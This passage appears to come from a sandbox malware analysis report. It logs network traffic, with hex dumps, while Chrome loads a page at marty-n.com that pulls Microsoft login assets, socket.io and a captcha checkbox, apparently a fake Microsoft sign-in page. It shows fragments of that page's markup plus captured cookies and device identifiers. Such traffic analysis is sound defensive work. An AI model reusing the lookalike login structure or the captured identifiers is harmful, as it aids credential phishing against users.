                                                                                                              2024-10-25 20:23:36 UTC8000INData Raw: 32 30 65 61 73 65 2d 69 6e 2d 6f 75 74 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 61 6e 69 6d 61 74 69 6f 6e 3a 5c 78 32 30 64 6f 74 2d 66 6c 6f 61 74 69 6e 67 2d 62 65 66 6f 72 65 5c 78 32 30 32 73 5c 78 32 30 69 6e 66 69 6e 69 74 65 5c 78 32 30 65 61 73 65 2d 69 6e 2d 6f 75 74 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 7d 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 2e 64 6f 74 2d 66 6c 6f 61 74 69 6e 67 3a 3a 61 66 74 65 72 5c 78 32 30 7b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 6c 65 66 74 3a 5c 78 32 30 2d 31 32 70 78 3b 5c
                                                                                                              Data Ascii: 20ease-in-out;\x0a\x20\x20\x20\x20\x20\x20\x20\x20animation:\x20dot-floating-before\x202s\x20infinite\x20ease-in-out;\x0a\x20\x20\x20\x20}\x0a\x20\x20\x20\x20\x0a\x20\x20\x20\x20.dot-floating::after\x20{\x0a\x20\x20\x20\x20\x20\x20\x20\x20left:\x20-12px;\
                                                                                                              2024-10-25 20:23:36 UTC8000INData Raw: 78 32 30 2e 63 68 65 63 6b 62 6f 78 2d 77 72 61 70 70 65 72 2d 34 33 5c 78 32 30 69 6e 70 75 74 5b 74 79 70 65 3d 5c 78 32 32 63 68 65 63 6b 62 6f 78 5c 78 32 32 5d 5c 78 32 30 7b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 64 69 73 70 6c 61 79 3a 5c 78 32 30 6e 6f 6e 65 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 76 69 73 69 62 69 6c 69 74 79 3a 5c 78 32 30 68 69 64 64 65 6e 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 7d 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 2e 63 68 65 63 6b 62 6f 78 2d 77 72 61 70 70 65 72 2d 34 33 5c 78 32
                                                                                                              Data Ascii: x20.checkbox-wrapper-43\x20input[type=\x22checkbox\x22]\x20{\x0a\x20\x20\x20\x20\x20\x20\x20\x20display:\x20none;\x0a\x20\x20\x20\x20\x20\x20\x20\x20visibility:\x20hidden;\x0a\x20\x20\x20\x20}\x0a\x20\x20\x20\x20\x0a\x20\x20\x20\x20.checkbox-wrapper-43\x2
                                                                                                              2024-10-25 20:23:36 UTC8000INData Raw: 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 64 69 73 70 6c 61 79 3a 5c 78 32 30 62 6c 6f 63 6b 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 7d 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 2e 73 69 64 65 42 61 72 3e 69 6d 67 5c 78 32 30 7b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 6d 61 72 67 69 6e 3a 5c 78 32 30 31 30 70 78 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78
                                                                                                              Data Ascii: 0\x20\x20\x20\x20\x20\x20\x20\x20display:\x20block;\x0a\x20\x20\x20\x20\x20\x20\x20\x20}\x0a\x20\x20\x20\x20\x20\x20\x20\x20.sideBar>img\x20{\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20margin:\x2010px;\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
                                                                                                              2024-10-25 20:23:36 UTC8000INData Raw: 72 65 73 65 6e 74 61 74 69 6f 6e 5c 78 32 32 5c 78 32 30 70 6e 67 73 72 63 3d 5c 78 32 32 68 74 74 70 73 3a 2f 2f 6c 6f 67 69 6e 63 64 6e 2e 6d 73 61 75 74 68 2e 6e 65 74 2f 73 68 61 72 65 64 2f 31 2e 30 2f 63 6f 6e 74 65 6e 74 2f 69 6d 61 67 65 73 2f 61 72 72 6f 77 5f 6c 65 66 74 5f 37 63 63 30 39 36 64 61 36 61 61 32 64 62 61 33 66 38 31 66 63 63 31 63 38 32 36 32 31 35 37 63 2e 70 6e 67 5c 78 32 32 5c 78 32 30 73 76 67 73 72 63 3d 5c 78 32 32 68 74 74 70 73 3a 2f 2f 6c 6f 67 69 6e 63 64 6e 2e 6d 73 61 75 74 68 2e 6e 65 74 2f 73 68 61 72 65 64 2f 31 2e 30 2f 63 6f 6e 74 65 6e 74 2f 69 6d 61 67 65 73 2f 61 72 72 6f 77 5f 6c 65 66 74 5f 61 39 63 63 32 38 32 34 65 66 33 35 31 37 62 36 63 34 31 36 30 64 63 66 38 66 66 37 64 34 31 30 2e 73 76 67 5c 78 32 32
                                                                                                              Data Ascii: resentation\x22\x20pngsrc=\x22https://logincdn.msauth.net/shared/1.0/content/images/arrow_left_7cc096da6aa2dba3f81fcc1c8262157c.png\x22\x20svgsrc=\x22https://logincdn.msauth.net/shared/1.0/content/images/arrow_left_a9cc2824ef3517b6c4160dcf8ff7d410.svg\x22
                                                                                                              2024-10-25 20:23:36 UTC8000INData Raw: 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 64 61 74 61 2d 62 69 6e 64 3d 5c 78 32 32 69 6d 67 53 72 63 5c 78 32 32 5c 78 32 30 73 72 63 3d 5c 78 32 32 68 74 74 70 73 3a 2f 2f 6c 6f 67 69 6e 63 64 6e 2e 6d 73 61 75 74 68 2e 6e 65 74 2f 73 68 61 72 65 64 2f 31 2e 30 2f 63 6f 6e 74 65 6e 74 2f 69 6d 61 67 65 73 2f 61 72 72 6f 77 5f 6c 65 66 74 5f 61 39 63 63 32 38 32 34 65 66 33 35 31 37 62 36 63 34 31 36 30 64 63 66 38 66 66 37 64 34 31 30 2e 73 76 67 5c 78 32 32 3e 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30
                                                                                                              Data Ascii: 0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20data-bind=\x22imgSrc\x22\x20src=\x22https://logincdn.msauth.net/shared/1.0/content/images/arrow_left_a9cc2824ef3517b6c4160dcf8ff7d410.svg\x22>\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20
                                                                                                              2024-10-25 20:23:36 UTC8000INData Raw: 5c 78 32 30 5c 78 32 30 3c 21 2d 2d 5c 78 32 30 3c 69 6e 70 75 74 5c 78 32 30 63 6c 61 73 73 3d 5c 78 32 32 72 65 63 61 70 74 63 68 61 63 68 65 63 6b 62 6f 78 5c 78 32 32 5c 78 32 30 74 79 70 65 3d 5c 78 32 32 63 68 65 63 6b 62 6f 78 5c 78 32 32 5c 78 32 30 6e 61 6d 65 3d 5c 78 32 32 5c 78 32 32 5c 78 32 30 69 64 3d 5c 78 32 32 5c 78 32 32 3e 5c 78 32 30 2d 2d 3e 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 3c 64 69 76 5c 78 32 30 63 6c 61 73 73 3d 5c 78 32 32 72 65 63 61 70 74 63 68 61 73 75 62 5c 78 32 32 3e 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78
                                                                                                              Data Ascii: \x20\x20...\x20<input\x20class=\x22recaptchacheckbox\x22\x20type=\x22checkbox\x22\x20name=\x22\x22\x20id=\x22\x22>\x20-->\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20<div\x20class=\x22recaptchasub\x22>\x0a\x20\x20\x20\x20\x20\x20\x


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              30192.168.2.164974318.245.31.334431992C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-10-25 20:23:35 UTC359OUTGET /4.7.5/socket.io.min.js HTTP/1.1
                                                                                                              Host: cdn.socket.io
                                                                                                              Connection: keep-alive
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                              Accept: */*
                                                                                                              Sec-Fetch-Site: none
                                                                                                              Sec-Fetch-Mode: cors
                                                                                                              Sec-Fetch-Dest: empty
                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                              2024-10-25 20:23:35 UTC702INHTTP/1.1 200 OK
                                                                                                              Content-Type: application/javascript; charset=utf-8
                                                                                                              Content-Length: 49993
                                                                                                              Connection: close
                                                                                                              Accept-Ranges: bytes
                                                                                                              Access-Control-Allow-Origin: *
                                                                                                              Cache-Control: public, max-age=31536000, immutable
                                                                                                              Content-Disposition: inline; filename="socket.io.min.js"
                                                                                                              Date: Sat, 03 Aug 2024 07:26:50 GMT
                                                                                                              ETag: "777eb8fd4f8320b6e5cc9a7159bdec6a"
                                                                                                              Server: Vercel
                                                                                                              Strict-Transport-Security: max-age=63072000
                                                                                                              X-Vercel-Cache: HIT
                                                                                                              X-Vercel-Id: fra1::4xmtd-1722670010047-e30d468233ba
                                                                                                              X-Cache: Hit from cloudfront
                                                                                                              Via: 1.1 193d38535c6cb246e365763e9c32e672.cloudfront.net (CloudFront)
                                                                                                              X-Amz-Cf-Pop: FRA56-P8
                                                                                                              X-Amz-Cf-Id: hR9lklIwhJPTYVbZkKOnMLEQ0KITXDl3cew-F3TZQBo1A7QSW9iejA==
                                                                                                              Age: 7595206
                                                                                                              2024-10-25 20:23:35 UTC15682INData Raw: 2f 2a 21 0a 20 2a 20 53 6f 63 6b 65 74 2e 49 4f 20 76 34 2e 37 2e 35 0a 20 2a 20 28 63 29 20 32 30 31 34 2d 32 30 32 34 20 47 75 69 6c 6c 65 72 6d 6f 20 52 61 75 63 68 0a 20 2a 20 52 65 6c 65 61 73 65 64 20 75 6e 64 65 72 20 74 68 65 20 4d 49 54 20 4c 69 63 65 6e 73 65 2e 0a 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 74 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 74 29 3a 28 65 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67
                                                                                                              Data Ascii: /*! * Socket.IO v4.7.5 * (c) 2014-2024 Guillermo Rauch * Released under the MIT License. */!function(e,t){"object"==typeof exports&&"undefined"!=typeof module?module.exports=t():"function"==typeof define&&define.amd?define(t):(e="undefined"!=typeof g
                                                                                                              2024-10-25 20:23:36 UTC16384INData Raw: 64 20 74 68 69 73 2e 73 65 74 54 69 6d 65 6f 75 74 46 6e 28 28 66 75 6e 63 74 69 6f 6e 28 29 7b 74 2e 6f 6e 45 72 72 6f 72 28 65 29 7d 29 2c 30 29 7d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 64 6f 63 75 6d 65 6e 74 26 26 28 74 68 69 73 2e 69 6e 64 65 78 3d 69 2e 72 65 71 75 65 73 74 73 43 6f 75 6e 74 2b 2b 2c 69 2e 72 65 71 75 65 73 74 73 5b 74 68 69 73 2e 69 6e 64 65 78 5d 3d 74 68 69 73 29 7d 7d 2c 7b 6b 65 79 3a 22 6f 6e 45 72 72 6f 72 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 74 68 69 73 2e 65 6d 69 74 52 65 73 65 72 76 65 64 28 22 65 72 72 6f 72 22 2c 65 2c 74 68 69 73 2e 78 68 72 29 2c 74 68 69 73 2e 63 6c 65 61 6e 75 70 28 21 30 29 7d 7d 2c 7b 6b 65 79 3a 22 63 6c 65 61 6e 75 70 22 2c 76 61 6c 75 65 3a 66 75 6e
                                                                                                              Data Ascii: d this.setTimeoutFn((function(){t.onError(e)}),0)}"undefined"!=typeof document&&(this.index=i.requestsCount++,i.requests[this.index]=this)}},{key:"onError",value:function(e){this.emitReserved("error",e,this.xhr),this.cleanup(!0)}},{key:"cleanup",value:fun
                                                                                                              2024-10-25 20:23:36 UTC16384INData Raw: 65 2e 64 61 74 61 2c 69 64 3a 65 2e 69 64 7d 29 7d 7d 2c 7b 6b 65 79 3a 22 65 6e 63 6f 64 65 41 73 53 74 72 69 6e 67 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 22 22 2b 65 2e 74 79 70 65 3b 72 65 74 75 72 6e 20 65 2e 74 79 70 65 21 3d 3d 42 65 2e 42 49 4e 41 52 59 5f 45 56 45 4e 54 26 26 65 2e 74 79 70 65 21 3d 3d 42 65 2e 42 49 4e 41 52 59 5f 41 43 4b 7c 7c 28 74 2b 3d 65 2e 61 74 74 61 63 68 6d 65 6e 74 73 2b 22 2d 22 29 2c 65 2e 6e 73 70 26 26 22 2f 22 21 3d 3d 65 2e 6e 73 70 26 26 28 74 2b 3d 65 2e 6e 73 70 2b 22 2c 22 29 2c 6e 75 6c 6c 21 3d 65 2e 69 64 26 26 28 74 2b 3d 65 2e 69 64 29 2c 6e 75 6c 6c 21 3d 65 2e 64 61 74 61 26 26 28 74 2b 3d 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 65 2e 64 61 74 61 2c 74 68 69
                                                                                                              Data Ascii: e.data,id:e.id})}},{key:"encodeAsString",value:function(e){var t=""+e.type;return e.type!==Be.BINARY_EVENT&&e.type!==Be.BINARY_ACK||(t+=e.attachments+"-"),e.nsp&&"/"!==e.nsp&&(t+=e.nsp+","),null!=e.id&&(t+=e.id),null!=e.data&&(t+=JSON.stringify(e.data,thi
                                                                                                              2024-10-25 20:23:36 UTC1543INData Raw: 65 74 54 69 6d 65 6f 75 74 46 6e 28 28 66 75 6e 63 74 69 6f 6e 28 29 7b 74 2e 73 6b 69 70 52 65 63 6f 6e 6e 65 63 74 7c 7c 28 65 2e 65 6d 69 74 52 65 73 65 72 76 65 64 28 22 72 65 63 6f 6e 6e 65 63 74 5f 61 74 74 65 6d 70 74 22 2c 74 2e 62 61 63 6b 6f 66 66 2e 61 74 74 65 6d 70 74 73 29 2c 74 2e 73 6b 69 70 52 65 63 6f 6e 6e 65 63 74 7c 7c 74 2e 6f 70 65 6e 28 28 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 6e 3f 28 74 2e 5f 72 65 63 6f 6e 6e 65 63 74 69 6e 67 3d 21 31 2c 74 2e 72 65 63 6f 6e 6e 65 63 74 28 29 2c 65 2e 65 6d 69 74 52 65 73 65 72 76 65 64 28 22 72 65 63 6f 6e 6e 65 63 74 5f 65 72 72 6f 72 22 2c 6e 29 29 3a 74 2e 6f 6e 72 65 63 6f 6e 6e 65 63 74 28 29 7d 29 29 29 7d 29 2c 6e 29 3b 74 68 69 73 2e 6f 70 74 73 2e 61 75 74 6f 55 6e 72 65 66 26 26 72 2e
                                                                                                              Data Ascii: etTimeoutFn((function(){t.skipReconnect||(e.emitReserved("reconnect_attempt",t.backoff.attempts),t.skipReconnect||t.open((function(n){n?(t._reconnecting=!1,t.reconnect(),e.emitReserved("reconnect_error",n)):t.onreconnect()})))}),n);this.opts.autoUnref&&r.


                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                              31192.168.2.1649751204.79.197.200443
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-10-25 20:23:35 UTC2232OUTPOST /threshold/xls.aspx HTTP/1.1
                                                                                                              Origin: https://www.bing.com
                                                                                                              Referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init
                                                                                                              Accept: */*
                                                                                                              Accept-Language: en-CH
                                                                                                              Content-type: text/xml
                                                                                                              X-Agent-DeviceId: 01000A4109009A83
                                                                                                              X-BM-CBT: 1729887742
                                                                                                              X-BM-DateFormat: dd/MM/yyyy
                                                                                                              X-BM-DeviceDimensions: 784x640
                                                                                                              X-BM-DeviceDimensionsLogical: 784x640
                                                                                                              X-BM-DeviceScale: 100
                                                                                                              X-BM-DTZ: -240
                                                                                                              X-BM-Market: CH
                                                                                                              X-BM-Theme: 000000;0078d7
                                                                                                              X-BM-WindowsFlights: FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124117A5,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66E,FX:12CDE644,FX:12D1574C,FX:12D281C4,FX:12E8312D,FX:12E85C75
                                                                                                              X-Device-ClientSession: 03BBCBA1937A4CF7B4AD5C321610FE95
                                                                                                              X-Device-isOptin: false
                                                                                                              X-Device-MachineId: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}
                                                                                                              X-Device-OSSKU: 48
                                                                                                              X-Device-Touch: false
                                                                                                              X-DeviceID: 01000A4109009A83
                                                                                                              X-MSEdge-ExternalExp: d-thshld42,dsbdailyset_c,expmegaclick_cf,hashexpt3,iffsqloptwin10c,msbdsbedu9cf,wsbqfnewsynonym,wsbref-t,wsbswgc-t2
                                                                                                              X-MSEdge-ExternalExpType: JointCoord
                                                                                                              X-PositionerType: Desktop
                                                                                                              X-Search-AppId: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI
                                                                                                              X-Search-CortanaAvailableCapabilities: None
                                                                                                              X-Search-SafeSearch: Moderate
                                                                                                              X-Search-TimeZone: Bias=300; DaylightBias=-60; TimeZoneKeyName=Eastern Standard Time
                                                                                                              X-UserAgeClass: Unknown
                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
                                                                                                              Host: www.bing.com
                                                                                                              Content-Length: 3422
                                                                                                              Connection: Keep-Alive
                                                                                                              Cache-Control: no-cache
                                                                                                              Cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=117ACB7E7D246FD81513DF607C366EB7&CPID=1707317782133&AC=1&CPH=c645c844; _EDGE_S=SID=117ACB7E7D246FD81513DF607C366EB7&mkt=de-ch; SRCHUID=V=2&GUID=E0DD87A720F84B6F91D233EB006F66A1&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20240207; SRCHHPGUSR=SRCHLANG=de&HV=1729887743&IPMH=35531570&IPMID=1707317782133; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
                                                                                                              2024-10-25 20:23:35 UTC3422OUTData Raw: 3c 43 6c 69 65 6e 74 49 6e 73 74 52 65 71 75 65 73 74 3e 3c 43 49 44 3e 35 30 34 37 45 35 39 34 32 42 42 32 34 36 30 45 41 33 35 42 35 33 43 43 46 37 38 44 44 42 33 44 3c 2f 43 49 44 3e 3c 45 76 65 6e 74 73 3e 3c 45 3e 3c 54 3e 45 76 65 6e 74 2e 43 6c 69 65 6e 74 49 6e 73 74 3c 2f 54 3e 3c 49 47 3e 61 32 66 30 30 35 35 66 36 31 30 39 34 31 35 62 62 65 65 31 35 37 33 61 35 65 30 66 32 63 31 33 3c 2f 49 47 3e 3c 44 3e 3c 21 5b 43 44 41 54 41 5b 7b 22 43 75 72 55 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 69 6e 67 2e 63 6f 6d 2f 41 53 2f 41 50 49 2f 57 69 6e 64 6f 77 73 43 6f 72 74 61 6e 61 50 61 6e 65 2f 56 32 2f 49 6e 69 74 22 2c 22 50 69 76 6f 74 22 3a 22 51 46 22 2c 22 54 22 3a 22 43 49 2e 42 6f 78 4d 6f 64 65 6c 22 2c 22 46 49 44 22 3a 22 43
                                                                                                              Data Ascii: <ClientInstRequest><CID>5047E5942BB2460EA35B53CCF78DDB3D</CID><Events><E><T>Event.ClientInst</T><IG>a2f0055f6109415bbee1573a5e0f2c13</IG><D><![CDATA[{"CurUrl":"https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init","Pivot":"QF","T":"CI.BoxModel","FID":"C
                                                                                                              2024-10-25 20:23:35 UTC428INHTTP/1.1 204 No Content
                                                                                                              Access-Control-Allow-Origin: *
                                                                                                              X-Cache: CONFIG_NOCACHE
                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                              X-MSEdge-Ref: Ref A: 78186249378F41DC9034D90F42890D23 Ref B: DFW311000105033 Ref C: 2024-10-25T20:23:35Z
                                                                                                              Date: Fri, 25 Oct 2024 20:23:34 GMT
                                                                                                              Connection: close


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              32192.168.2.164975013.107.246.454431992C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-10-25 20:23:35 UTC647OUTGET /shared/1.0/content/images/arrow_left_a9cc2824ef3517b6c4160dcf8ff7d410.svg HTTP/1.1
                                                                                                              Host: logincdn.msauth.net
                                                                                                              Connection: keep-alive
                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                              Sec-Fetch-Dest: image
                                                                                                              Referer: https://marty-n.com/
                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                              2024-10-25 20:23:35 UTC799INHTTP/1.1 200 OK
                                                                                                              Date: Fri, 25 Oct 2024 20:23:35 GMT
                                                                                                              Content-Type: image/svg+xml
                                                                                                              Content-Length: 276
                                                                                                              Connection: close
                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                              Content-Encoding: gzip
                                                                                                              Last-Modified: Wed, 22 Jan 2020 00:38:00 GMT
                                                                                                              ETag: 0x8D79ED35591CF44
                                                                                                              x-ms-request-id: 1b5f1178-f01e-0058-66d4-266cb6000000
                                                                                                              x-ms-version: 2009-09-19
                                                                                                              x-ms-lease-status: unlocked
                                                                                                              x-ms-blob-type: BlockBlob
                                                                                                              Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                              Access-Control-Allow-Origin: *
                                                                                                              x-azure-ref: 20241025T202335Z-16849878b78j5kdg3dndgqw0vg00000002m000000001124f
                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                              X-Cache-Info: L1_T2
                                                                                                              X-Cache: TCP_HIT
                                                                                                              Accept-Ranges: bytes
                                                                                                              2024-10-25 20:23:35 UTC276INData Raw: 1f 8b 08 00 00 00 00 00 04 00 95 51 3d 6f c3 20 10 fd 2b 88 ae e6 e0 08 d8 b8 b2 3d 74 ca 90 ae 1d ba 45 8a 6b 5b 22 1f aa 91 c9 cf 2f 67 3b 6e 87 2c 15 f0 80 bb 7b ef 9e a0 1a a7 8e dd cf fe 32 d6 bc 0f e1 f6 2a 65 8c 11 e2 0e ae df 9d d4 4a 29 99 2a 38 8b c3 29 f4 35 d7 86 b3 be 1d ba 3e 2c e7 69 68 e3 db f5 5e 73 c5 14 d3 26 4d de 54 61 08 be 6d 8e e3 d8 86 b1 92 cb ad ba 1d 43 cf 4e 35 7f 47 97 21 82 2d dc 04 ce 98 7d 01 39 16 7e 07 a5 c6 8c d0 09 b0 a5 a1 75 c8 33 d4 de 40 69 8c 98 71 4b cc 9c 55 e5 93 b3 af c1 fb 9a bf 18 45 83 cb bf bd 14 f1 b2 02 94 cd fd 53 fa 1e ff ef e3 ac 04 a0 41 01 aa c0 b4 0e 36 95 97 a4 47 9b 05 67 1d 11 d6 2c 66 33 67 c1 35 46 1b b1 49 9d da d8 47 40 3c 0e 98 4c 2e 3a 60 b5 4e 26 01 3f 52 03 93 0c cf 89 64 b4 b0 28 08 37
                                                                                                              Data Ascii: Q=o +=tEk["/g;n,{2*eJ)*8)5>,ih^s&MTamCN5G!-}9~u3@iqKUESA6Gg,f3g5FIG@<L.:`N&?Rd(7


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              33192.168.2.164974613.107.246.454431992C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-10-25 20:23:35 UTC649OUTGET /shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.svg HTTP/1.1
                                                                                                              Host: aadcdn.msauth.net
                                                                                                              Connection: keep-alive
                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                              Sec-Fetch-Dest: image
                                                                                                              Referer: https://marty-n.com/
                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                              2024-10-25 20:23:35 UTC785INHTTP/1.1 200 OK
                                                                                                              Date: Fri, 25 Oct 2024 20:23:35 GMT
                                                                                                              Content-Type: image/svg+xml
                                                                                                              Content-Length: 1435
                                                                                                              Connection: close
                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                              Content-Encoding: gzip
                                                                                                              Last-Modified: Wed, 24 May 2023 10:11:48 GMT
                                                                                                              ETag: 0x8DB5C3F4911527F
                                                                                                              x-ms-request-id: fc914089-601e-0028-6ad6-26d541000000
                                                                                                              x-ms-version: 2009-09-19
                                                                                                              x-ms-lease-status: unlocked
                                                                                                              x-ms-blob-type: BlockBlob
                                                                                                              Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                              Access-Control-Allow-Origin: *
                                                                                                              x-azure-ref: 20241025T202335Z-17c5cb586f6hn8cl90dxzu28kw00000000s000000000nwn7
                                                                                                              x-fd-int-roxy-purgeid: 4554691
                                                                                                              X-Cache: TCP_HIT
                                                                                                              Accept-Ranges: bytes
